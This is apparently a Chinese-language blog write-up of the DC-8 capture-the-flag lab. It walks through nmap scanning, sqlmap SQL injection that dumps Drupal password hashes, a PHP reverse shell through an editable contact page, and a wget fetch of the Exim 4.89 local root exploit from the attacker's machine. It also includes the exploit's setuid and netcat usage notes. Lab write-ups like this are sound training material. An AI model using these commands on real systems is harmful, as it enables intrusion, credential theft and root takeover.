Mamor's Blog
0%

DCchallenges8

发表于 分类于
本文字数: 5k 阅读时长 ≈ 5 分钟

信息收集

环境

网段 192.168.18.0/24

kali 192.168.18.131

靶机 192.168.18.141

扫描网段

kali@kali2020:~$ sudo nmap 192.168.18.0/24 -sn [sudo] kali 的密码: Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-08 21:27 CST Nmap scan report for 192.168.18.2 Host is up (0.00035s latency). MAC Address: 00:50:56:E0:DA:9A (VMware) Nmap scan report for 192.168.18.141 Host is up (0.00063s latency). MAC Address: 00:0C:29:F3:39:D5 (VMware) Nmap scan report for 192.168.18.254 Host is up (0.00032s latency). MAC Address: 00:50:56:FD:0E:3D (VMware) Nmap scan report for 192.168.18.131 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 3.53 seconds

扫描靶机

kali@kali2020:~$ sudo nmap 192.168.18.141 -p- -sV Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-08 21:30 CST Nmap scan report for 192.168.18.141 Host is up (0.0015s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) 80/tcp open http Apache httpd MAC Address: 00:0C:29:F3:39:D5 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.93 seconds

dirsearch扫目录

sudo python3 dirsearch -u 192.168.18.141

没扫到什么东西,换dirb扫到了

http://192.168.18.141/user

sql注入

进入主页,点左侧的Details下的链接,发现url处有个nid的参数,看看这里是否存在sql注入

sqlmap跑一下

sqlmap -u http://192.168.18.141/?nid=3 --batch

sqlmap -u http://192.168.18.141/?nid=3 --batch --dbs

available databases [2]:
[*] d7db [*] information_schema

sqlmap -u http://192.168.18.141/?nid=3 --batch -D d7db --tables

Database: d7db
[88 tables] +-----------------------------+ | filter | | system | | actions | | authmap | | batch | | block | | block_custom | | block_node_type | | block_role | | blocked_ips | | cache | | cache_block | | cache_bootstrap | | cache_field | | cache_filter | | cache_form | | cache_image | | cache_menu | | cache_page | | cache_path | | cache_views | | cache_views_data | | ckeditor_input_format | | ckeditor_settings | | ctools_css_cache | | ctools_object_cache | | date_format_locale | | date_format_type | | date_formats | | field_config | | field_config_instance | | field_data_body | | field_data_field_image | | field_data_field_tags | | field_revision_body | | field_revision_field_image | | field_revision_field_tags | | file_managed | | file_usage | | filter_format | | flood | | history | | image_effects | | image_styles | | menu_custom | | menu_links | | menu_router | | node | | node_access | | node_revision | | node_type | | queue | | rdf_mapping | | registry | | registry_file | | role | | role_permission | | search_dataset | | search_index | | search_node_links | | search_total | | semaphore | | sequences | | sessions | | shortcut_set | | shortcut_set_users | | site_messages_table | | taxonomy_index | | taxonomy_term_data | | taxonomy_term_hierarchy | | taxonomy_vocabulary | | url_alias | | users | | users_roles | | variable | | views_display | | views_view | | watchdog | | webform | | webform_component | | webform_conditional | | webform_conditional_actions | | webform_conditional_rules | | webform_emails | | webform_last_download | | webform_roles | | webform_submissions | | webform_submitted_data | +-----------------------------+

sqlmap -u http://192.168.18.141/?nid=3 --batch -D d7db -T users --columns

Database: d7db
Table: users [16 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | language | varchar(12) | | access | int(11) | | created | int(11) | | data | longblob | | init | varchar(254) | | login | int(11) | | mail | varchar(254) | | name | varchar(60) | | pass | varchar(128) | | picture | int(11) | | signature | varchar(255) | | signature_format | varchar(255) | | status | tinyint(4) | | theme | varchar(255) | | timezone | varchar(32) | | uid | int(10) unsigned |


sqlmap -u http://192.168.18.141/?nid=3 --batch -D d7db -T users -C name,pass -dump

Database: d7db
Table: users [2 entries] +-------+---------------------------------------------------------+ | name | pass | +-------+---------------------------------------------------------+ | admin | \(S\)D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | | john | \(S\)DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | +-------+---------------------------------------------------------+

跑出来两条数据 ,但是密码是加密的,根据john用户名提示,使用john解密


admin 使用john没跑出来

john 密码为turtle

http://192.168.18.141/user/登录成功

打开content看看


反弹shell

contact us页面可以编辑

修改成php格式

反弹交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

find / -perm -u=s -type f 2>/dev/null 查看具有root权限的命令

试着利用下exim4

查看exim4版本

exim4 --version

Exim version 4.89

searchsploit exim 4

找下exp,选择46996.sh,拷贝到本地,并开启kali的http服务

cp /usr/share/exploitdb/exploits/linux/local/46996.sh dc8.sh

python2 -m SimpleHTTPServer

在靶机上下载kali的shell,先回到/tmp 目录下

wget http://192.168.18.131:8000/dc8.sh

注意:直接把exp下载过去是无法使用的,sed -i -e 's/\r$//' dc8.sh

www-data@dc-8:/tmp$ ls ls getShell.sh www-data@dc-8:/tmp$ chmod 777 dc8.sh
chmod 777 dc8.sh www-data@dc-8:/tmp$ ./dc8.sh

看下提示用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Usage (setuid method):

# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#



Reference

https://www.freebuf.com/articles/web/261074.html

https://my.oschina.net/u/3896378/blog/4427624

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------